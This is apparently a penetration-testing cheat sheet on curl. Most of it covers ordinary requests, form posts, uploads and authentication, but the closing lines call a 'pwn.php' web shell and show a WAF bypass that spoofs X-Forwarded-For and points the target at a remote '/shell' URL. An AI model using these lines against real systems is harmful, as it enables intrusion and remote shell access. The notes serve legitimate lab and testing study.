Hack$Notes
Search…
Curl
Transfer a URL
CURL is a tool to transfer data from or to a server, using one of the supported protocols
DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3,
POP3S, RTMP, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET and TFTP

The command is designed to work without user interaction.

curl:
-v: verbose
-F: file upload
-X: make a request

Examples

##### GET example #####
curl http://www.example.com
##### GET example with hidden info #####
curl -i http://www.example.com
##### HEAD example #####
curl --head http://www.example.com
or
curl -I http://www.example.com
##### Multiple URL's #####
curl http://url1.example.com http://url2.example.com
##### Trace all connections: more than verbose #####
curl --trace-ascii output_filename.txt http://www.example.com
##### Saves output to a file #####
curl http://www.example.com -O output_filename.txt
##### Passing username:password #####
curl http://user:[email protected]/
or
curl -u user:password http://example.org/

Get-form

<form method="GET" action="junk.cgi">
<input type=text name="birthyear">
<input type=submit name=press value="OK">
</form>
curl "http://www.hotmail.com/when/junk.cgi?birthyear=1905&press=OK"

Post-form

<form method="POST" action="junk.cgi">
<input type=text name="birthyear">
<input type=submit name=press value=" OK ">
</form>
curl --data "birthyear=1905&press=%20OK%20" http://www.example.com/when.cgi

File Upload Post

<form method="POST" enctype='multipart/form-data' action="upload.cgi">
<input type=file name=upload>
<input type=submit name=press value="OK">
</form>
curl --form [email protected] --form press=OK [URL]

Hidden fields

<form method="POST" action="foobar.cgi">
<input type=text name="birthyear">
<input type=hidden name="person" value="daniel">
<input type=submit name="press" value="OK">
</form>
curl --data "birthyear=1905&press=OK&person=daniel" [URL]

Put

curl --upload-file uploadfile http://www.example.com/receive.cgi

Location header

##### Follows redirection #####
curl --location http://www.example.com

User-Agent

curl -A "user-agent-name" -L 10.10.10.10
-A: sets the user-agent
-L: follows the redirection
Authenticate through CLI
curl -u 'username':'password' http://10.10.10.10:8080/path/to/page
curl http://username:[email protected]:8080/login
curl -X POST http://10.10.10.10:8080/login -d 'user=username&password=password'
curl -X POST http://10.10.10.10:8080/login -d 'username=username&password=password'
JSON Web Token:
curl http://10.10.10.10:8080/login -H 'Authorisation: Bearer token_here'
curl -s http://10.10.10.10:8080/users/1 -H 'Authorisation: Bearer token_here'
curl -s http://10.10.10.10:8080/users/Admin -H 'Authorisation: Bearer token_here'

Curl Call

curl --user username:password 10.10.10.10/pwn.php

Bypass WAF and pass data

curl -X POST http://10.10.10.10/some_content -H "Content-Type: application/json" -H "X-Forwarded-For: localhost" --data ‘{"user":"myusername","url":"http://10.10.10.20/shell"}’